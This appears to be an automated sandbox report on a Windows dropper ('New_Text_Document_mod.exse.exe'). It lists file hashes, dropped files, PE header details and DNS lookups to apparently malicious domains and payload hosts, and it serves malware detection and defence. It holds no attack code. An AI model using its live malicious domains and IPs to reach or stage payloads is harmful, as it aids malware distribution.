	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	207.180.199.64
	Rechnung002387723.exe	Get hash	malicious	AveMaria, UACMe	Browse	173.212.199.134

Process:	C:\Users\user\AppData\Local\0e02b0bb-f517-46fa-b1ee-2b79cc8d533e\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8791335562660096
Encrypted:	false
SSDEEP:	96:xkFFdtMp+kEHtQVUUyxXExQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7HeS9+xJ:eltMQkElr0BU/KaC0zuiF2Z24IO8jQ
MD5:	6FCCFEA52BC95929D1CD7DF7BD7791C8
SHA1:	7E275E8DC155BF84A8B691768FFF5F62B6FADC44
SHA-256:	6AAAA0758C5E016A16D6FDCBB89BAB7C7AD8ADF59F243CABB7BA3A705577B333
SHA-512:	51EFD36F45B77174FC75EF48FFDC79F3EA68CA3A6ABBA7FF6DA5FF2D84076D6E708EEC80ED6D6CFA0384F51383AE78D212D53BAC2BB0FB0DE53A555493C2B647
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.7.5.5.6.5.0.1.6.4.8.9.6.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.7.5.5.6.5.0.2.2.4.2.7.1.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.6.a.9.3.f.3.-.1.7.9.b.-.4.8.1.9.-.8.f.4.8.-.e.e.9.a.f.9.a.5.2.b.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.d.0.8.6.b.f.-.5.e.b.c.-.4.4.a.a.-.8.3.7.e.-.9.0.d.5.5.8.3.b.d.9.9.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.p.f.a.s.i.a.z.x...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.p.f.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.6.8.-.0.0.0.1.-.0.0.1.4.-.f.a.4.2.-.a.b.b.6.5.1.3.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.a.f.b.b.3.1.8.0.9.2.9.4.4.f.4.e.0.0.7.e.0.7.d.e.e.0.8.c.6.f.1.0.0.0.0.0.0.0.0.!.0.0.0.0.7.f.d.c.e.e.9.d.5.e.4.b.b.6.a.b.3.f.e.8.1.9.5.6.4.0.e.a.e.f.4.b.f.8.7.1.e.3.6.3.!.

Process:	C:\Users\user\AppData\Local\f15b091f-1934-40da-8f03-7d990bd3b905\buildz.exe
File Type:	data
Category:	dropped
Size (bytes):	626
Entropy (8bit):	7.681198772551176
Encrypted:	false
SSDEEP:	12:kNZnBaxrEGPq3CKRFwc8DacdENFiCVS4ee0gFRTPjS1D9uHV1+cii9a:qGPqyWwc8DaMCQ4B0w/OfbD
MD5:	5F44D660C7CEF1DA1D54B1EFC3BE7B44
SHA1:	2D82FEEAAC1A9148F1C9185AC9398C7106739E65
SHA-256:	DF30E51180E6F6D251B389A66BE135E3FE35982EE80CC901D778ADDB5CA42F5E
SHA-512:	8B21A3C0FC575BC6D8B39BF0E082B9C23380D23930FE5C1C1A12C6026B8DD1E9727A8F8D3F6BFE922C61E4B819F717C690A4E2686975CEF1CAE8EA86CDFCE3E9
Malicious:	false
Reputation:	unknown
Preview:	2023/d....Qt.@..[.. ..B...{.Y....V0{=..a...6.....L..6.W@4..K...s.\8zND....JO...E........9..~..O......P.,...dg%.&.4...........z..w..`v&....`S....BZ..t...$.......\IWQsy..0..T.j.......Q.....d...;...8O1j..,..B0...b...Av^.\|.Sl{a.7...._:...a...../..../..O...qdA..al..NP@..I..7i)j@.......]emp...L]C~.;].EJ.}"...f.k.\|Z.`......#..0'..=2..n=.E".....tH?...G.\^\|.eE..&LR.ap.?%...7.d.E...8y.......<..3L..{.........x..~.A.]j......fg..w.e8...;....>*.._...k^.....6c+Z.M.....?4....h.b".KmN...)..'..)5.....wX......'..........-..C.}.:....v.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

Process:	C:\Users\user\Desktop\a\buildz.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	11214
Entropy (8bit):	7.984014101157458
Encrypted:	false
SSDEEP:	192:zK6ZjfZ78cAA46MBPeBD7lhSdU+A/C1ZaozVThYfFLdkauP7iz:GYjfZ79CV+D7WU+A/C1vzVThYsrP7iz
MD5:	513D0DF41455D1C1D4CD23E2B8BD4960
SHA1:	67FF94DA1FAD9B987DD7A76306A5FCDB1FBB2D7D
SHA-256:	929CFFE34460D7E0E9FBBDD6C3654214EB9359F4253002939CEEA6FBC1AFF803
SHA-512:	CE28DFC9CC1F9549F8F226CA6C65D05B8E1879192CC37B4FDF30C7FA56BA3667C98924D979147CBAD8E0C0B3B6809B4A0B850BC14FA4850D76B2591E6F8BD9E7
Malicious:	false
Reputation:	unknown
Preview:	%!Ado.R./.o..6..../.....fB.i.\..bO...3..P.`.2&.GY Y.....\.8....R.yW..^."...#.W....hb..... .)H8..#l..l.~...n....y.....C\|......I..i..e.&.. .....B.Dnz...8rh.`.^+..X$.E._m4X..A.I....u../.M.4e.~}c....R.a.....Wb....Q.k....-..?6.....1c^.9_.....l..........L...s...........p%.....5..l......8...........=~u)J.......KO..%\|....8s.`....Nu.{..j ...W.1n.,`....D....Z........\|.K...5.....H.....w.... 7Z..[.....W.3......-.NS$.g.DCkY.er<..N.6.@....J..\uH\|......"....#.:...s.b.N....k...Y0...^7..F.K...x...lIu..y[./...........i.#..P...x..p..hNZ.{rO[.s..e...N."....y..^ #U~..t.......#`_....e..F.J...W.r./z~..?..B?.LS.......+-9.5.._zD(...b.'.~1).f...'..?.iP..r....H:~.].APo9a..k"s.......O~p..Q.{R.l....w.tV...l3.D.wG.(^Qx(.l.i.R..4.S..0..D..G1x..TO.g0A...\i.S.*X....g..%...eF.T.%.'..?&..rIF.E....ZU...4...P,.c.......&.g`v.%..4.`. ..:t...OdV..x.B.1..w"..B.Y n..4.u...\...h... .5.8...3.&...lLK34.:{.wZF.&...$.....&c...t.N.(.~.+..(...".G.M.AH#^u.U.p....nY....v~%...

Process:	C:\Users\user\Desktop\a\alex.exe
File Type:	data
Category:	dropped
Size (bytes):	1550
Entropy (8bit):	7.870471747693516
Encrypted:	false
SSDEEP:	24:8D5Zqz5TpXcArzxIiSH8VG/Vuhu6Es0wkSRwlmnqGyViObD:8Drqz5T9byiSH8VG/VkfFRwlmnqGy0sD
MD5:	753653AF65B2D6C096648ED020AB2237
SHA1:	CDEB5BEFC871737B68F343FE19BEE138DCF8FABA
SHA-256:	881C46D189F7B18A681E4828A8BFA73623AD181A019E78D538A06935F160D987
SHA-512:	7AD18612C7129E32C55EF356340CAA14A75862B3937E7D05340930631E359EBCAE4ACE980C8A79E86429DC12F6061BE15F596E7DA8CF57DC49823F0F4DD91D4B
Malicious:	false
Reputation:	unknown
Preview:	1,"fuM.p......./...4...E..9-..o..Q1.4..=.x..#........gHH..oT2r$...C.U......u...z...R.........k.J.......f.{.@N.w...R.7.}a.,5..v...\|-V/..F.<.#d..Dd....]<L..X.m^f.WR.....c...[X..Cg..s....9...X....Q..QCC...E..,LV.A)....4....(q.@X5=..rd.Ql..XM`.v.b.....o..c...7s.t..\|....m.O...7.Qm.P..;p.\|!V.Iz.. .."...l..v.z..-........b. ......G..T\.........z.t.T2.. .>..... ...[..N..s{..Le._.{.eO..k:..L.$%...(....}<....cG U....'.\*.m.....-/...I&h..x/..L.SNf...o..]..sT8.v()X6S....Jt....$.3.Gn.....h.Z..J......i..N.m.5....f..Z.Pzcm.....N.(8u./4...,?=.o....=n...q9.BX...........q.R..j)....;.3...8.a..x.PUl.Ec.jRU/../8._...j...U.S.z...n...8].&..R.fQ.....~Xig..N...9.......4Z.>.1..a.@uz.)^.m.w..>...!.R!$....0.+...;.Ug.g)p.7w..xsV.xX..d.y2.k..vU.b.."\..9......~....Y....K..2.Ty....&I=w.`.>.3... 1..+..h+...i. ..:.j-..m.K..%.....{.......7............Q.Q\...j....yi....@a..A.......$.-...dy".G`uV.mjek...]".>..2{]<A.....M.N./..\...&..r.......%D.................QaY._M>.O.

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.838950934453595
Encrypted:	false
SSDEEP:	192:Dxoe5nVsm5emdZ2Ca6pZlbjvwRjdHPRhwgkjDt4iWN3yBGHB9smMdcU6CDpOeibY:NQopbjvwRjdvR5kjh4iUxeLib4J
MD5:	3D6DC70FDDC7BE176013904F5F6ED066
SHA1:	73638AF4A419E0A7DC397B9477A0C2EDB8DE9490
SHA-256:	5D7466A771B69DBDB540C50BC6EBE324B4FA3BDA6E0F4CC92CEC930148FCCFAA
SHA-512:	60552F022AE9418514820B7BF8243434FFE2BBEE7F34D8ED7D053679928C583CFB4C07FE62588629A6064C196184F6DB0D7FDBDB26692FC1CA9B1C99F248B117
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process:	C:\Users\user\Desktop\New_Text_Document_mod.exse.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13815856
Entropy (8bit):	7.996175022835632
Encrypted:	true
SSDEEP:	393216:iiIE7YoSD2nwW+eGQRIMTozGxu8C0ibfz6e57Z1bmXdWCUI:L7rSDawW+e5R5oztZ026e5DkVUI
MD5:	125A5C30FD99F5F53B2914E9F6CF1627
SHA1:	C26195A24760F7C6621C63BF79B8D1F36E3EC04B
SHA-256:	15548DC4AAB59A1ECC65D7CBE37B2A6224E8BE7682621E8F6B9ED851AB6F4E97
SHA-512:	A40F99DBF33AFBB7A9A6F8425DA9F3FDC564FCD3A8A0E8F76A830A5C6DA558158EF51FB907C24897ABA82C1499156AEAC636CA0EEB4F527BF5EC8FB43B39905A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 65%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....3ye.........."....%.....^.................@.............................p............`.....................................................x....`....... ..."...........`..\...0..................................@............... ............................text............................... ..`.rdata...+.......,..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc..\....`......................@..B................................................................................................................................................................................................

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.826946743624939
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	New_Text_Document_mod.exse.exe
File size:	8'192 bytes
MD5:	69994ff2f00eeca9335ccd502198e05b
SHA1:	b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256:	2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512:	ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP:	96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
TLSH:	3EF10901DBD0C7BAC6B703B50C63A6408A79E3091A679FAF28CD41A7AD5639C02D3772
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.........."...P..............4... ...@....@.. ....................................@................................

Entrypoint:	0x4034e6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6582889D [Wed Dec 20 06:24:29 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3494	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x50c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x14ec	0x1600	False	0.5165127840909091	data	5.400435668498685	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x50c	0x600	False	0.3834635416666667	data	3.8163688955569137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6000	0xc	0x200	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x4090	0x27c	data			0.4481132075471698
RT_MANIFEST	0x431c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 20, 2023 15:34:57.666695118 CET	192.168.2.4	1.1.1.1	0x5afc	Standard query (0)	urlhaus.abuse.ch	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:34:58.913299084 CET	192.168.2.4	1.1.1.1	0x1c68	Standard query (0)	china.dhabigroup.top	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:00.253381014 CET	192.168.2.4	1.1.1.1	0xb9c5	Standard query (0)	tmpfiles.org	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:05.546251059 CET	192.168.2.4	1.1.1.1	0x11b7	Standard query (0)	mrproper.org	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:06.617887020 CET	192.168.2.4	1.1.1.1	0x88ae	Standard query (0)	domen414.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:08.188771009 CET	192.168.2.4	1.1.1.1	0xc4dc	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:08.363784075 CET	192.168.2.4	1.1.1.1	0xd854	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:09.203819990 CET	192.168.2.4	1.1.1.1	0x8884	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:12.116997004 CET	192.168.2.4	1.1.1.1	0xd5db	Standard query (0)	mail.acestar.com.ph	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:13.502712011 CET	192.168.2.4	1.1.1.1	0xd5db	Standard query (0)	mail.acestar.com.ph	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:13.982645988 CET	192.168.2.4	1.1.1.1	0xbf08	Standard query (0)	brusuax.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:14.979971886 CET	192.168.2.4	1.1.1.1	0xbf08	Standard query (0)	brusuax.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:20.495398998 CET	192.168.2.4	1.1.1.1	0x31ab	Standard query (0)	edarululoom.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:21.597477913 CET	192.168.2.4	1.1.1.1	0xadc8	Standard query (0)	132xz-1319111867.cos.ap-beijing.myqcloud.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:21.617882013 CET	192.168.2.4	1.1.1.1	0x2786	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:25.002584934 CET	192.168.2.4	1.1.1.1	0xdfcc	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:25.847186089 CET	192.168.2.4	1.1.1.1	0xffe2	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:27.550385952 CET	192.168.2.4	1.1.1.1	0xbf33	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:27.942126989 CET	192.168.2.4	1.1.1.1	0x8a8c	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:32.671104908 CET	192.168.2.4	1.1.1.1	0x2ba5	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:42.831721067 CET	192.168.2.4	1.1.1.1	0x499c	Standard query (0)	www.magssin.com	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:37:20.438431978 CET	192.168.2.4	1.1.1.1	0xbc6b	Standard query (0)	comediantes.org	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2023 15:34:57.800777912 CET	1.1.1.1	192.168.2.4	0x5afc	No error (0)	urlhaus.abuse.ch	p2.shared.global.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2023 15:34:59.339731932 CET	1.1.1.1	192.168.2.4	0x1c68	No error (0)	china.dhabigroup.top		172.67.195.16	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:34:59.339731932 CET	1.1.1.1	192.168.2.4	0x1c68	No error (0)	china.dhabigroup.top		104.21.52.41	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:00.389811039 CET	1.1.1.1	192.168.2.4	0xb9c5	No error (0)	tmpfiles.org		104.21.21.16	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:00.389811039 CET	1.1.1.1	192.168.2.4	0xb9c5	No error (0)	tmpfiles.org		172.67.195.247	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:05.788362980 CET	1.1.1.1	192.168.2.4	0x11b7	No error (0)	mrproper.org		104.21.63.180	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:05.788362980 CET	1.1.1.1	192.168.2.4	0x11b7	No error (0)	mrproper.org		172.67.171.152	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:06.809931993 CET	1.1.1.1	192.168.2.4	0x88ae	No error (0)	domen414.com		104.21.91.52	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:06.809931993 CET	1.1.1.1	192.168.2.4	0x88ae	No error (0)	domen414.com		172.67.166.192	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:08.313874960 CET	1.1.1.1	192.168.2.4	0xc4dc	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2023 15:35:08.313874960 CET	1.1.1.1	192.168.2.4	0xc4dc	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:08.313874960 CET	1.1.1.1	192.168.2.4	0xc4dc	No error (0)	api4.ipify.org		173.231.16.77	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:08.313874960 CET	1.1.1.1	192.168.2.4	0xc4dc	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:08.519757986 CET	1.1.1.1	192.168.2.4	0xd854	No error (0)	github.com		140.82.113.4	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:09.328859091 CET	1.1.1.1	192.168.2.4	0x8884	No error (0)	objects.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:09.328859091 CET	1.1.1.1	192.168.2.4	0x8884	No error (0)	objects.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:09.328859091 CET	1.1.1.1	192.168.2.4	0x8884	No error (0)	objects.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:09.328859091 CET	1.1.1.1	192.168.2.4	0x8884	No error (0)	objects.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:13.339432955 CET	1.1.1.1	192.168.2.4	0xd5db	No error (0)	mail.acestar.com.ph		45.33.104.46	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:13.628464937 CET	1.1.1.1	192.168.2.4	0xd5db	No error (0)	mail.acestar.com.ph		45.33.104.46	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685837030 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685837030 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685837030 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		180.94.156.61	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685837030 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		201.218.66.48	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685837030 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		189.232.1.60	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685837030 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685837030 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		175.126.109.15	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685837030 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		109.175.29.39	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685837030 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685837030 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		2.180.10.7	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685856104 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685856104 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685856104 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		180.94.156.61	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685856104 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		201.218.66.48	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685856104 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		189.232.1.60	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685856104 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685856104 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		175.126.109.15	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685856104 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		109.175.29.39	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685856104 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:15.685856104 CET	1.1.1.1	192.168.2.4	0xbf08	No error (0)	brusuax.com		2.180.10.7	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:20.684670925 CET	1.1.1.1	192.168.2.4	0x31ab	No error (0)	edarululoom.com		104.21.42.224	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:20.684670925 CET	1.1.1.1	192.168.2.4	0x31ab	No error (0)	edarululoom.com		172.67.167.33	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:21.763823986 CET	1.1.1.1	192.168.2.4	0x2786	No error (0)	api.2ip.ua		172.67.139.220	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:21.763823986 CET	1.1.1.1	192.168.2.4	0x2786	No error (0)	api.2ip.ua		104.21.65.24	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:21.876159906 CET	1.1.1.1	192.168.2.4	0xadc8	No error (0)	132xz-1319111867.cos.ap-beijing.myqcloud.com	bj.file.myqcloud.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2023 15:35:21.876159906 CET	1.1.1.1	192.168.2.4	0xadc8	No error (0)	bj.file.myqcloud.com		82.156.94.48	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:21.876159906 CET	1.1.1.1	192.168.2.4	0xadc8	No error (0)	bj.file.myqcloud.com		82.156.94.13	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:21.876159906 CET	1.1.1.1	192.168.2.4	0xadc8	No error (0)	bj.file.myqcloud.com		82.156.94.17	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:21.876159906 CET	1.1.1.1	192.168.2.4	0xadc8	No error (0)	bj.file.myqcloud.com		82.156.94.45	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:21.876159906 CET	1.1.1.1	192.168.2.4	0xadc8	No error (0)	bj.file.myqcloud.com		82.156.94.47	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:25.132744074 CET	1.1.1.1	192.168.2.4	0xdfcc	No error (0)	api.gofile.io		151.80.29.83	A (IP address)	IN (0x0001)	false
Dec 20, 2023 15:35:25.132744074 CET	1.1.1.1	192.168.2.4	0xdfcc	No error (0)	api.gofile.io		51.38.43.18	A (IP address)	IN (0x0001)	false
